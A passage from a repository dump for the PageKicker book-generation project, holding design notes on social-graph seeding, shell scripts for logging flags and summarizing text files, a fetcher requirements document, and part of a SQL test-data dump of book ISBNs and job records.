third, and obvious extensions fourth.\n# enroll new users\nAt a certain point, we should create a new user profile if the search is distinct enough. Not a second data capture, just a recognition that the graph is far enough apart from a prior seeded graph that it should not generate the same Social, adjacent, and obvious extensions....\n# authenticate via FB, LinkedIn, or Twitter\nAuthenticate and offer a chance for the user to disambiguate (under the $1.99 subscription model) at this time\n# create user id & account\nAccount is already created, what I vision is the the ID is begining to be created as the data and the seed terms are ranked and processed\n# capture user inpht re seeds\nOriginal data and second pass data and permissioned data fromm the social sites and their profiles\n# analyze and assemble user provided seeds\n\n# build user provided seeds\nMatch with system provided obvious seed packages (SEED--music, top 40,....SEED PACKAGE---list of top 40 songs for the week, match all artists on the list, provide play list for each artist)\n\n# harvest graphs from FB, LinkedIn, Twitter\nIs this occuring after the creation of the ID? Or is this part of the creation of an ID for a graph?\n\t#FB\n\n\t#LinkedIn\n\n\t#Twitter\n\n# carry out entity extraction and analysis against\nDon’t do all of the analysis at the start. Cache it and deliver the analysis in 5 minutes. Allow the first couple of graphs to fill, and then provide the follow on. The user experience will look for a natural feedback, so new input will continually refine the graph, I bet that practiced users will be looking for a higher order build, and will appreciate the lag as it will allow for a refinement of the seed terms.\n\t#FB\n\n\t#LinkedIn\n\n\t#Twitter\n\n# is it better to harvest all at once, then analyze all at once, or to harvest & extract one at a time? Following the above logic, harvest and extract one ata time, allowing for a superior build. User will begin to chose which to harvest first, and will guide for a better harvest and extraction with practice. This will become part of the user ID (say use FB first for my son and Linked In for me)\n\n\n# analyze and assemble list of graph provided seeds\n\n# compare graph provided seeds to user provided seeds, eliminate duplicates\nWill the same seeds provide identical results if they search in slightly different data pools or in a different sequence? Before we eliminate dups, we should ask if the customer wants all dups searched in different sequences...etc.\n# should user provided seeds trump? not necessarily ...\nProvide all, until the user profile suggests a preference\n# build graph provided seeds\n\n# when all (most?) builds are complete ...\nNot sure. Good question. Needs data on the user experience. \n# share all/most graphs\nSame as above\n" }, { "alpha_fraction": 0.6942551136016846, "alphanum_fraction": 0.6942551136016846, "avg_line_length": 64.41935729980469, "blob_id": "0ae0078c0c4fbf9855a56ccc8b0a0680401d55b8", "content_id": "7fee8e3529827fd7f6a009a020fd3341657ab860", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 2054, "license_type": "permissive", "max_line_length": 90, "num_lines": 31, "path": "/scripts/includes/echo-flags.sh", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": " \necho \"values after command line processing are:\" | tee --append $sfb_log\necho \"mediatargetpath is\" $mediatargetpath | tee --append $sfb_log\necho \"deliverytargetpath is \" $deliverytargetpath | tee --append $sfb_log\necho \"metadatatargetpath is \" $metadatatargetpath | tee --append $sfb_log\necho \"scriptpath is\" $scriptpath | tee --append $sfb_log\necho \"price is \" ${FLAGS_price} | tee --append $sfb_log\necho \"category id is \" ${FLAGS_categoryid} | tee --append $sfb_log\necho \"value of rows is \" ${FLAGS_rows} | tee --append $sfb_log\necho \"seedfile is \" ${FLAGS_seedfile} | tee --append $sfb_log\necho \"escapecustomtitle is \" $escapecustomtitle| tee --append $sfb_log\necho \"userid is \" ${FLAGS_userid} | tee --append $sfb_log\necho \"coverfile is \" ${FLAGS_coverfile} | tee --append $sfb_log\necho \"fetchonly is \" ${FLAGS_fetchonly} | tee --append $sfb_log\necho \"fetchfile is \" ${FLAGS_fetchfile} | tee --append $sfb_log\necho \"special_lasts_minutes \" ${FLAGS_special_lasts_minutes} | tee --append $sfb_log\necho \"special price is \" ${FLAGS_special_price} | tee --append $sfb_log\necho \"covercolor is \" ${FLAGS_covercolor} | tee --append $sfb_log\necho \"text extraction is on \" ${FLAGS_text_extractoin_on} | tee --append $sfb_log\necho \"fresh is \" ${FLAGS_fresh} | tee --append $sfb_log\necho \"escapeedited_by is \" $escapeedited_by | tee --append $sfb_log\necho \"seedsource is \" ${FLAGS_seedsource} | tee --append $sfb_log\necho \"breaking is \" ${FLAGS_breaking} | tee --append $sfb_log\necho 'covertype id is ' {$FLAGS}\necho \"editorid is \" ${FLAGS_editorid} | tee --append $sfb_log\necho \"escapesingleseed is \" $escapesingleseed | tee --append $sfb_log\necho \"import is \" ${FLAGS_import} | tee --append $sfb_log\necho \"fleet is \" ${FLAGS_fleet} | tee --append $sfb_log\necho \"booktype is \" ${FLAGS_booktype} | tee --append $sfb_log\necho \"ebookformat is \" ${FLAGS_ebookformat} | tee --append $sfb_log\necho \"endurl is\" ${FLAGS_endurl} | tee --append $sfb_log\necho \"fetched_document_format is\" ${FLAGS_fetched_document_format} | tee --append $sfb_log\n" }, { "alpha_fraction": 0.7873429656028748, "alphanum_fraction": 0.7882736325263977, "avg_line_length": 88.54166412353516, "blob_id": "43c58242fe106bf08733b56e9a9db6cf70e2443f", "content_id": "160532a519b092bf5619d3b05bdb6ca56607f836", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Text", "length_bytes": 2149, "license_type": "permissive", "max_line_length": 291, "num_lines": 24, "path": "/docs/fetcher_requirements.txt", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "Fetcher Responsibilities\n\nIn PageKicker **fetchers** are programs that accept input parameters (typically, queries) and return relevant documents for inclusion in the completed book. Python or bash are preferred.\n\nFetchers must do the following things. (In future all this stuff should be much more abstracted).\n\n- Accept one or more **seeds** (key phrases) read from $TMPDIR$uuid/seedphrases.\n - Other parameters such as geography, language, are optional. It is the responsibility of the fetcher to provide a mechanism for the operator to provide those parameters. Usually, this should be accomplished via the command line, or in a file specified at the command line.\n- Validate with an external API.\n- Submit queries using seeds to the API. It's the fetcher's responsibility to put those queries in the desired. Default should be alpha.\n- Store results in $TMPDIR$uuid/apis/<apiname>\n- Preferred result format is markdown. Other formats should be converted to markdown. Converting \"up\" from low-semantic-value-added formats such as txt and json to markdown produces more reliable results than converting \"down\" from PDF and html. Markdown supports simple tables and images.\n- Create bibliography entries for each fetched document (text format) and store them in $TMPDIR$uuid/apis/<apiname>/bibentries.txt\n\nFor fetched documents to be incorporated in books, the following things must occur.\n\nText from fetched documents should by default be included in the cover wordcloud, which means that it needs to be appended to $TMPDIR$uuid/wiki/wiki4cloud.md prior to the java -jar command that builds the wordcloud. (In future this should be abstracted to 4cloud.md).\n\nText from fetched documents should be either:\na) appended to an existing \"part of the book\", such as $TMPDIR$uuid/chapters.md, or ...\nb) given its own \"new\" part of the book, e.g. $TMPDIR$uuid/cyberwatch.md.\nc) New parts of the book must be registered in all --booktype scripts, i.e. the cat commands in includes/partsofthebook.sh and includes/draft-report.sh.\n\nBibliography entries from fetched documents need to be piped into $TMPDIR$uuid/sources.md when that file is created.\n" }, { "alpha_fraction": 0.6468735933303833, "alphanum_fraction": 0.659919023513794, "avg_line_length": 19.971698760986328, "blob_id": "34776adff6c2cbd31afb23a9db237e0f78113895", "content_id": "a0c1d1b8b3a112af506b1bee19a185fb6df72033", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 2223, "license_type": "permissive", "max_line_length": 124, "num_lines": 106, "path": "/scripts/process_txt_dir.sh", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "#!/bin/bash\n# processes all txt files in a directory\n\n\n# input: directory path that contains txt files with txt extension\n# note - this would break on splitter output - fix\n# output: directory with results\n\n. includes/set-variables.sh\nwordcloud=\"off\"\nconfigfile=\"lib/IBMcloud/examples/configuration.txt\"\noutdir=\"\"\n\nwhile :\ndo\ncase $1 in\n--help | -\\?)\necho \"requires user to provide path to directory containing one or more txt files\"\nexit 0 # This is not an error, the user requested help, so do not exit status 1.\n;;\n--txtdir)\ntxtdir=$2\nshift 2\n;;\n--txtdir=*)\ntxtdir=${1#*=}\nshift\n;;\n--stopimagefolder)\nstopimagefolder=$2\nshift 2\n;;\n--stopimagefolder=*)\nstopimagefolder=${1#*=}\nshift\n;;\n--outdir)\noutdir=$2\nshift 2\n;;\n--outdir=*)\noutdir=${1#*=}\nshift\n;;\n--wordcloud)\nwordcloud=$2\nshift 2\n;;\n--wordcloud=*)\nwordcloud=${1#*=}\nshift\n;;\n--summary_lines)\nsummary_lines=$2\nshift 2\n;;\n--summary_lines=*)\nsummary_lines=${1#*=}\nshift\n;;\n --) # End of all options\n shift\n break\n ;;\n -*)\n echo \"WARN: Unknown option (ignored): $1\" >&2\n shift\n ;;\n *) # no more options. Stop while loop\n break\n ;;\n\nesac\ndone\n\n# Suppose some options are required. Check that we got them.\n\nif [ ! \"$txtdir\" ]; then\n echo \"ERROR: option '--txtdir[txtdir]' not given. See --help\" >&2\n exit 1\nfi\n\nmkdir -p -m 755 $outdir\n\nfor file in \"$txtdir\"*.txt\ndo\n\toutfile=`basename $file`\n\t\"$PYTHON_BIN\" \"$scriptpath\"bin/PKsum.py $file --output $outdir$outfile\".sum\" --length 1 \n\t\"$PYTHON_BIN\" \"$scriptpath\"bin/nerv3.py $file $outdir$outfile\".ner\" $outdir$outfile\".\"\n\n\tif [ \"$wordcloud\" = \"on\" ] ; then\n\n\t\t/opt/bitnami/apache2/htdocs/pk-new/development/scripts/bin/wordcloudwrapper.sh --txtinfile $file --outfile $outdir$outfile\n\t\t echo \"summarized and recognized proper nouns, and built wordcloud for\" $file \n\n\telse\n\t\t echo \"summarized and recognized proper nouns for\" $file \n\tfi\ndone\necho \"done processing individual txt files in directory \" $txtdir\ncat $outdir*.ner > $outdir\"all.ner.txt\"\ncat $outdir*.sum > $outdir\"all.sum.txt\"\n\necho \"concatenated results into txt files containing all NER results, all summary results, and the union of both\"\n\nexit 0\n" }, { "alpha_fraction": 0.2883087694644928, "alphanum_fraction": 0.6604402661323547, "avg_line_length": 68.45526123046875, "blob_id": "ba2bf7705a37fa66271101a9ce1d2a4dd74f9e58", "content_id": "d37f63cc43515e3adfe96f640d8ba4797839b7d2", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "SQL", "length_bytes": 79258, "license_type": "permissive", "max_line_length": 585, "num_lines": 1140, "path": "/conf/databases/sfb-test-data.sql", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "-- phpMyAdmin SQL Dump\n-- version 4.0.5\n-- http://www.phpmyadmin.net\n--\n-- Host: localhost:3306\n-- Generation Time: Nov 16, 2013 at 06:11 PM\n-- Server version: 5.5.32\n-- PHP Version: 5.4.19\n\nSET SQL_MODE = \"NO_AUTO_VALUE_ON_ZERO\";\nSET time_zone = \"+00:00\";\n\n\n/*!40101 SET @OLD_CHARACTER_SET_CLIENT=@@CHARACTER_SET_CLIENT */;\n/*!40101 SET @OLD_CHARACTER_SET_RESULTS=@@CHARACTER_SET_RESULTS */;\n/*!40101 SET @OLD_COLLATION_CONNECTION=@@COLLATION_CONNECTION */;\n/*!40101 SET NAMES utf8 */;\n\n--\n-- Database: `sfb-jobs`\n--\n\n-- --------------------------------------------------------\n\n--\n-- Table structure for table `books`\n--\n\nCREATE TABLE IF NOT EXISTS `books` (\n `SKU` int(11) NOT NULL,\n `Booktype` text CHARACTER SET utf8 COLLATE utf8_unicode_ci NOT NULL,\n `uuid` text CHARACTER SET latin1 NOT NULL,\n `seed` text CHARACTER SET latin1 NOT NULL,\n `graph` int(11) NOT NULL\n) ENGINE=InnoDB DEFAULT CHARSET=utf8;\n\n-- --------------------------------------------------------\n\n--\n-- Table structure for table `graph nodes`\n--\n\nCREATE TABLE IF NOT EXISTS `graph nodes` (\n `URL` text NOT NULL,\n `DOI` text NOT NULL,\n `Title` int(11) NOT NULL,\n `Source` int(11) NOT NULL,\n `nodeid` int(11) NOT NULL AUTO_INCREMENT,\n PRIMARY KEY (`nodeid`)\n) ENGINE=InnoDB DEFAULT CHARSET=latin1 AUTO_INCREMENT=1 ;\n\n-- --------------------------------------------------------\n\n--\n-- Table structure for table `graphs`\n--\n\nCREATE TABLE IF NOT EXISTS `graphs` (\n `graphid` int(11) NOT NULL AUTO_INCREMENT,\n PRIMARY KEY (`graphid`)\n) ENGINE=InnoDB DEFAULT CHARSET=utf8 AUTO_INCREMENT=1 ;\n\n-- --------------------------------------------------------\n\n--\n-- Table structure for table `isbns`\n--\n\nCREATE TABLE IF NOT EXISTS `isbns` (\n `ISBN` mediumtext NOT NULL,\n `Title` mediumtext NOT NULL,\n `id` int(11) NOT NULL AUTO_INCREMENT,\n PRIMARY KEY (`id`)\n) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='manage ISBNs' AUTO_INCREMENT=39 ;\n\n--\n-- Dumping data for table `isbns`\n--\n\nINSERT INTO `isbns` (`ISBN`, `Title`, `id`) VALUES\n('9781608880003', 'Azkatraz 2009', 1),\n('9781608880010', 'Ultimate Unofficial Guide to The Harry Potter Fandom, The', 2),\n('9781608880027', 'Simple Sabotage Manual: Timeless Managerial Wisdom from the Intelligence Community, The', 3),\n('9781608880041', 'Young Conservative''s Field Guide, The', 4),\n('9781608880058', 'Case of the Truncated Troodon, The', 5),\n('9781608880065', 'Journey to the Ends of the Earth', 6),\n('9781608880072', 'Fifty Years of Flight Research: An Annotated Bibliography of Technical Publications of NASA Dryden Flight Research Center, 1946-1996', 7),\n('9781608880089', 'European Axis Signal Intelligence in World War II', 8),\n('9781608880096', 'Cold War Saga', 9),\n('9781608880102', 'LOST SYMBOL -- Found: Unauthorized Analysis of Dan Brown''s Novel, THE', 10),\n('9781608880119', 'LOST SYMBOL -- Found: Unauthorized Analysis of Dan Brown''s Novel, THE', 11),\n('9781608880126', 'Tora Bora Revisited: How We Failed to Catch Osama Bin Laden and How It Matters Today', 12),\n('9781608880133', 'US Patrol Torpedo Boats in World War II, 1939-1945', 13),\n('9781608880140', 'Young Conservative''s Field Guide, The', 14),\n('9781608880157', 'German Underwater Ordnance Mines', 15),\n('9781608880164', 'Warner Bros. Entertainment, Inc. & J. K. Rowling v. RDR Books and 10 Does', 16),\n('9781608880171', 'Skeeter Uses Manners', 17),\n('9781608880188', 'Case of the Armored Allosaurus, The', 18),\n('9781608880195', 'You''ve Got to Stand for Something!', 19),\n('9781608880201', 'Operation Weseruebung: The Dawn of Decisive Airpower in Joint Military Operations', 20),\n('9781608880218', 'So Much for Democracy: Citizens United v. Federal Election Commission', 21),\n('9781608880225', 'Operation Sea Lion: A Joint Critical Analysis, Or, How Hitler Could Have Won, If He Were More \"Joint\"', 22),\n('9781608880232', 'Sea-Based Airpower - The Decisive Factor In Expeditionary Operations? (Norway, 1940; Falkland Islands, 1982)', 23),\n('9781608880249', 'Oops! Boom! An Analysis of Fratricide in US Naval Surface and Submarine Forces in World War II', 24),\n('9781608880256', 'Submarine Warfare in the 20th and 21st Centuries - A Bibliography', 25),\n('9781608880263', 'Influence of Naval Power on the Course of the Spanish Civil War, 1936-1939, The', 26),\n('9781608880270', 'Historical Bibliography of Sea Mine Warfare', 27),\n('9781608880287', 'Influence of Maritime Theorists Alfred Thayer Mahan and Sir Julian Corbett on the Development of German Naval Strategy 1930-1936, The', 28),\n('9781608880294', 'Command and Control of the First Modern \"Joint\" Campaign: the German Invasion of Denmark and Norway, April 1940', 29),\n('9781608880300', 'Hitler''s Malta Option: A Comparison of the Invasion of Crete (Operation Merkur) and the Proposed Invasion of Malta (Operation Hercules)', 30),\n('9781608880317', 'Freyburg''s Failure At Crete: A Close-Run Thing', 31),\n('9781608880324', 'Falling from Grace: The German Airborne (Fallschirmjager) in World War II', 32),\n('9781608880331', 'Why the Allies Lost the Battle of Crete: How Allied Indecision, Bureaucracy, and Pretentiousness Lost the Battle', 33),\n('9781608880362', 'Obama''s Nuclear Posture Review: Or, We Won''t Nuke You Unless You Are a Really Bad Country, or We Change Our Minds', 34),\n('9781608880379', 'Self-Inflicted Wound Allied Defeat In Crete, May 1941', 35),\n('9781608880393', 'World War II Vertical Envelopment: The German Influence on U.S. Army Airborne Operations', 36),\n('9781608880409', 'Crete: The Graveyard of the Fallschirmjäger', 37),\n('9781608880416', 'Airborne and Airlift Operations in WWII (Enhanced with Text Analytics by PageKicker)', 38);\n\n-- --------------------------------------------------------\n\n--\n-- Table structure for table `jobs`\n--\n\nCREATE TABLE IF NOT EXISTS `jobs` (\n `SFB_revision_no` int(11) NOT NULL,\n `uuid` mediumtext NOT NULL,\n `job_created_time` timestamp NOT NULL DEFAULT CURRENT_TIMESTAMP ON UPDATE CURRENT_TIMESTAMP,\n `PRIMARY` int(11) NOT NULL AUTO_INCREMENT,\n `LANG` enum('en_US.UTF-8','cs_CZ.UTF-8','it_IT.UTF-8') NOT NULL DEFAULT 'en_US.UTF-8' COMMENT 'environment variable value',\n PRIMARY KEY (`PRIMARY`)\n) ENGINE=InnoDB DEFAULT CHARSET=utf8 AUTO_INCREMENT=442 ;\n\n--\n-- Dumping data for table `jobs`\n--\n\nINSERT INTO `jobs` (`SFB_revision_no`, `uuid`, `job_created_time`, `PRIMARY`, `LANG`) VALUES\n(341, '29d47ca0-ddf5-11e2-acfa-12313d015d04', '2013-06-26 00:13:01', 1, 'en_US.UTF-8'),\n(341, '776fabba-ddf5-11e2-acfa-12313d015d04', '2013-06-26 00:15:11', 2, 'en_US.UTF-8'),\n(341, 'c76e7e34-ddf5-11e2-acfa-12313d015d04', '2013-06-26 00:17:25', 3, 'en_US.UTF-8'),\n(341, 'f1695e84-ddf5-11e2-acfa-12313d015d04', '2013-06-26 00:18:36', 4, 'en_US.UTF-8'),\n(341, '952698de-ddf6-11e2-acfa-12313d015d04', '2013-06-26 00:23:10', 5, 'en_US.UTF-8'),\n(341, '3260b1a2-ddf7-11e2-acfa-12313d015d04', '2013-06-26 00:27:34', 6, 'en_US.UTF-8'),\n(341, '4bee0090-de9f-11e2-acfa-12313d015d04', '2013-06-26 20:30:52', 7, 'en_US.UTF-8'),\n(341, 'a123b32a-de9f-11e2-acfa-12313d015d04', '2013-06-26 20:33:15', 8, 'en_US.UTF-8'),\n(341, '4d370766-dea0-11e2-acfa-12313d015d04', '2013-06-26 20:38:04', 9, 'en_US.UTF-8'),\n(341, 'd4ee4782-dea0-11e2-acfa-12313d015d04', '2013-06-26 20:41:52', 10, 'en_US.UTF-8'),\n(341, '666d01da-dea1-11e2-acfa-12313d015d04', '2013-06-26 20:45:56', 11, 'en_US.UTF-8'),\n(341, 'e32256de-dea2-11e2-acfa-12313d015d04', '2013-06-26 20:56:35', 12, 'en_US.UTF-8'),\n(341, '338747be-dea4-11e2-acfa-12313d015d04', '2013-06-26 21:05:59', 13, 'en_US.UTF-8'),\n(341, 'a552f044-debf-11e2-acfa-12313d015d04', '2013-06-27 00:22:26', 14, 'en_US.UTF-8'),\n(341, 'c4b30fe6-debf-11e2-acfa-12313d015d04', '2013-06-27 00:23:19', 15, 'en_US.UTF-8'),\n(343, '86f74260-dec1-11e2-acfa-12313d015d04', '2013-06-27 00:35:54', 16, 'en_US.UTF-8'),\n(343, '74edbbc8-df46-11e2-acfa-12313d015d04', '2013-06-27 16:27:27', 17, 'en_US.UTF-8'),\n(343, '8e61470a-df50-11e2-acfa-12313d015d04', '2013-06-27 17:39:45', 18, 'en_US.UTF-8'),\n(343, '46d0eaae-e5a3-11e2-acfa-12313d015d04', '2013-07-05 18:47:00', 19, 'en_US.UTF-8'),\n(343, 'af5f30de-e5a4-11e2-acfa-12313d015d04', '2013-07-05 18:57:05', 20, 'en_US.UTF-8'),\n(343, '3baa1888-e5a5-11e2-acfa-12313d015d04', '2013-07-05 19:01:00', 21, 'en_US.UTF-8'),\n(343, 'c188ef56-e5a5-11e2-acfa-12313d015d04', '2013-07-05 19:04:45', 22, 'en_US.UTF-8'),\n(343, 'a10a5002-e5a6-11e2-acfa-12313d015d04', '2013-07-05 19:11:00', 23, 'en_US.UTF-8'),\n(343, 'd4532488-e5a7-11e2-acfa-12313d015d04', '2013-07-05 19:19:35', 24, 'en_US.UTF-8'),\n(343, '7b447c1a-e5a8-11e2-9599-12313d015d04', '2013-07-05 19:24:16', 25, 'en_US.UTF-8'),\n(343, '24073db0-e5a9-11e2-acfa-12313d015d04', '2013-07-05 19:28:59', 26, 'en_US.UTF-8'),\n(343, '5aa1b9c2-e5a9-11e2-acfa-12313d015d04', '2013-07-05 19:30:30', 27, 'en_US.UTF-8'),\n(343, 'b5871dae-e5aa-11e2-acfa-12313d015d04', '2013-07-05 19:40:12', 28, 'en_US.UTF-8'),\n(343, 'da417572-e5aa-11e2-acfa-12313d015d04', '2013-07-05 19:41:14', 29, 'en_US.UTF-8'),\n(344, 'a6db2178-e5ab-11e2-acfa-12313d015d04', '2013-07-05 19:46:57', 30, 'en_US.UTF-8'),\n(344, '9dc819f0-e5ac-11e2-acfa-12313d015d04', '2013-07-05 19:53:51', 31, 'en_US.UTF-8'),\n(344, '0f6cad5a-e5ad-11e2-acfa-12313d015d04', '2013-07-05 19:57:02', 32, 'en_US.UTF-8'),\n(344, '726733e4-e5ad-11e2-acfa-12313d015d04', '2013-07-05 19:59:48', 33, 'en_US.UTF-8'),\n(344, '2135d632-e5ae-11e2-acfa-12313d015d04', '2013-07-05 20:04:41', 34, 'en_US.UTF-8'),\n(344, '5ab07656-e5ae-11e2-acfa-12313d015d04', '2013-07-05 20:06:18', 35, 'en_US.UTF-8'),\n(344, 'a8f5d900-e5ae-11e2-acfa-12313d015d04', '2013-07-05 20:08:29', 36, 'en_US.UTF-8'),\n(344, 'e1190622-e5ae-11e2-acfa-12313d015d04', '2013-07-05 20:10:03', 37, 'en_US.UTF-8'),\n(344, '152393f6-e5af-11e2-acfa-12313d015d04', '2013-07-05 20:11:31', 38, 'en_US.UTF-8'),\n(344, '6c8d7fda-e5af-11e2-acfa-12313d015d04', '2013-07-05 20:13:57', 39, 'en_US.UTF-8'),\n(344, 'e281f432-e5af-11e2-acfa-12313d015d04', '2013-07-05 20:17:15', 40, 'en_US.UTF-8'),\n(345, '805e1682-e73f-11e2-acfa-12313d015d04', '2013-07-07 19:57:49', 41, 'en_US.UTF-8'),\n(345, '6078977e-e740-11e2-acfa-12313d015d04', '2013-07-07 20:04:05', 42, 'en_US.UTF-8'),\n(345, '8da80caa-e742-11e2-acfa-12313d015d04', '2013-07-07 20:19:40', 43, 'en_US.UTF-8'),\n(345, '72202598-e743-11e2-acfa-12313d015d04', '2013-07-07 20:26:03', 44, 'en_US.UTF-8'),\n(345, '82f9f72c-e743-11e2-acfa-12313d015d04', '2013-07-07 20:26:32', 45, 'en_US.UTF-8'),\n(345, '532fd2c2-e744-11e2-acfa-12313d015d04', '2013-07-07 20:32:21', 46, 'en_US.UTF-8'),\n(345, '11b8c51e-e745-11e2-acfa-12313d015d04', '2013-07-07 20:37:41', 47, 'en_US.UTF-8'),\n(345, '2dc0db98-e745-11e2-acfa-12313d015d04', '2013-07-07 20:38:28', 48, 'en_US.UTF-8'),\n(345, '66753a56-e745-11e2-acfa-12313d015d04', '2013-07-07 20:40:03', 49, 'en_US.UTF-8'),\n(345, 'b6fa6730-e745-11e2-acfa-12313d015d04', '2013-07-07 20:42:18', 50, 'en_US.UTF-8'),\n(345, 'c75dd602-e745-11e2-acfa-12313d015d04', '2013-07-07 20:42:45', 51, 'en_US.UTF-8'),\n(345, 'f61d509e-e745-11e2-acfa-12313d015d04', '2013-07-07 20:44:04', 52, 'en_US.UTF-8'),\n(345, '1f92adb6-e746-11e2-acfa-12313d015d04', '2013-07-07 20:45:13', 53, 'en_US.UTF-8'),\n(345, '2ced5868-e74a-11e2-acfa-12313d015d04', '2013-07-07 21:14:14', 54, 'en_US.UTF-8'),\n(345, 'ad46348a-e74a-11e2-acfa-12313d015d04', '2013-07-07 21:17:49', 55, 'en_US.UTF-8'),\n(345, 'cb165c7e-e74a-11e2-acfa-12313d015d04', '2013-07-07 21:18:39', 56, 'en_US.UTF-8'),\n(345, 'da7cc3ce-e74a-11e2-acfa-12313d015d04', '2013-07-07 21:19:05', 57, 'en_US.UTF-8'),\n(345, '25116d2c-e74b-11e2-acfa-12313d015d04', '2013-07-07 21:21:10', 58, 'en_US.UTF-8'),\n(345, '45e90d0c-e74b-11e2-acfa-12313d015d04', '2013-07-07 21:22:05', 59, 'en_US.UTF-8'),\n(345, '6aa92b36-e74b-11e2-acfa-12313d015d04', '2013-07-07 21:23:07', 60, 'en_US.UTF-8'),\n(345, 'a7f210ca-e74b-11e2-acfa-12313d015d04', '2013-07-07 21:24:50', 61, 'en_US.UTF-8'),\n(345, '413abbf6-e74c-11e2-acfa-12313d015d04', '2013-07-07 21:29:07', 62, 'en_US.UTF-8'),\n(345, '63da952c-e74d-11e2-acfa-12313d015d04', '2013-07-07 21:37:14', 63, 'en_US.UTF-8'),\n(345, 'bbe8a326-e74d-11e2-acfa-12313d015d04', '2013-07-07 21:39:42', 64, 'en_US.UTF-8'),\n(345, '35b1c934-e74f-11e2-acfa-12313d015d04', '2013-07-07 21:50:16', 65, 'en_US.UTF-8'),\n(345, '677d71ac-e74f-11e2-acfa-12313d015d04', '2013-07-07 21:51:39', 66, 'en_US.UTF-8'),\n(345, '36786b72-e75c-11e2-acfa-12313d015d04', '2013-07-07 23:23:21', 67, 'en_US.UTF-8'),\n(345, '85e12474-e75c-11e2-acfa-12313d015d04', '2013-07-07 23:25:34', 68, 'en_US.UTF-8'),\n(345, '516f92b0-e75d-11e2-acfa-12313d015d04', '2013-07-07 23:31:15', 69, 'en_US.UTF-8'),\n(345, '7c0951e6-e75d-11e2-acfa-12313d015d04', '2013-07-07 23:32:27', 70, 'en_US.UTF-8'),\n(345, '949ef468-e75d-11e2-acfa-12313d015d04', '2013-07-07 23:33:08', 71, 'en_US.UTF-8'),\n(345, 'e0d4707e-e75d-11e2-acfa-12313d015d04', '2013-07-07 23:35:16', 72, 'en_US.UTF-8'),\n(345, 'f2a26bb2-e75d-11e2-acfa-12313d015d04', '2013-07-07 23:35:46', 73, 'en_US.UTF-8'),\n(345, '4e576430-e75e-11e2-acfa-12313d015d04', '2013-07-07 23:38:20', 74, 'en_US.UTF-8'),\n(345, '004616c8-e75f-11e2-acfa-12313d015d04', '2013-07-07 23:43:18', 75, 'en_US.UTF-8'),\n(345, '1a7ab512-e75f-11e2-acfa-12313d015d04', '2013-07-07 23:44:02', 76, 'en_US.UTF-8'),\n(345, '536006a2-e75f-11e2-acfa-12313d015d04', '2013-07-07 23:45:38', 77, 'en_US.UTF-8'),\n(345, '1c85f7e4-e760-11e2-acfa-12313d015d04', '2013-07-07 23:51:15', 78, 'en_US.UTF-8'),\n(345, '6458c5f6-e760-11e2-acfa-12313d015d04', '2013-07-07 23:53:16', 79, 'en_US.UTF-8'),\n(345, 'c8d99136-e760-11e2-acfa-12313d015d04', '2013-07-07 23:56:04', 80, 'en_US.UTF-8'),\n(345, '00eee8b8-e762-11e2-acfa-12313d015d04', '2013-07-08 00:04:48', 81, 'en_US.UTF-8'),\n(345, '1544f53c-e762-11e2-acfa-12313d015d04', '2013-07-08 00:05:22', 82, 'en_US.UTF-8'),\n(345, 'bb98ba04-e762-11e2-acfa-12313d015d04', '2013-07-08 00:10:01', 83, 'en_US.UTF-8'),\n(345, 'd68b214e-e762-11e2-acfa-12313d015d04', '2013-07-08 00:10:46', 84, 'en_US.UTF-8'),\n(345, '62f6923a-e763-11e2-acfa-12313d015d04', '2013-07-08 00:14:42', 85, 'en_US.UTF-8'),\n(345, '8ea13aca-e763-11e2-acfa-12313d015d04', '2013-07-08 00:15:55', 86, 'en_US.UTF-8'),\n(345, 'af4a4e74-e763-11e2-acfa-12313d015d04', '2013-07-08 00:16:50', 87, 'en_US.UTF-8'),\n(345, 'cb02ea2c-e763-11e2-acfa-12313d015d04', '2013-07-08 00:17:36', 88, 'en_US.UTF-8'),\n(345, '306e6fea-e76d-11e2-acfa-12313d015d04', '2013-07-08 01:24:52', 89, 'en_US.UTF-8'),\n(345, '59578530-e76e-11e2-acfa-12313d015d04', '2013-07-08 01:33:10', 90, 'en_US.UTF-8'),\n(345, 'c76c8ef8-e76e-11e2-acfa-12313d015d04', '2013-07-08 01:36:15', 91, 'en_US.UTF-8'),\n(345, '3446167a-e76f-11e2-acfa-12313d015d04', '2013-07-08 01:39:17', 92, 'en_US.UTF-8'),\n(345, 'f20f3af6-e76f-11e2-acfa-12313d015d04', '2013-07-08 01:44:36', 93, 'en_US.UTF-8'),\n(345, '01da5796-e7e2-11e2-acfa-12313d015d04', '2013-07-08 15:21:05', 94, 'en_US.UTF-8'),\n(345, '5a3e8c58-e7e3-11e2-acfa-12313d015d04', '2013-07-08 15:30:43', 95, 'en_US.UTF-8'),\n(345, 'c157b2a2-e7e3-11e2-acfa-12313d015d04', '2013-07-08 15:33:36', 96, 'en_US.UTF-8'),\n(345, 'c9b8957e-e7e3-11e2-8c0d-12313d015d04', '2013-07-08 15:33:50', 97, 'en_US.UTF-8'),\n(345, 'f45c2b6e-e7e4-11e2-acfa-12313d015d04', '2013-07-08 15:42:11', 98, 'en_US.UTF-8'),\n(351, 'aad83d80-e806-11e2-acfa-12313d015d04', '2013-07-08 19:43:30', 99, 'en_US.UTF-8'),\n(351, '6613f8a4-e808-11e2-acfa-12313d015d04', '2013-07-08 19:55:54', 100, 'en_US.UTF-8'),\n(352, 'e64c9366-e80b-11e2-acfa-12313d015d04', '2013-07-08 20:20:58', 101, 'en_US.UTF-8'),\n(354, '8116d7c0-e8c6-11e2-acfa-12313d015d04', '2013-07-09 18:36:44', 102, 'en_US.UTF-8'),\n(354, 'ea3d2af0-e8c7-11e2-acfa-12313d015d04', '2013-07-09 18:46:50', 103, 'en_US.UTF-8'),\n(354, '831d832c-e8c9-11e2-acfa-12313d015d04', '2013-07-09 18:58:16', 104, 'en_US.UTF-8'),\n(354, 'aa2c760c-e8ca-11e2-acfa-12313d015d04', '2013-07-09 19:06:31', 105, 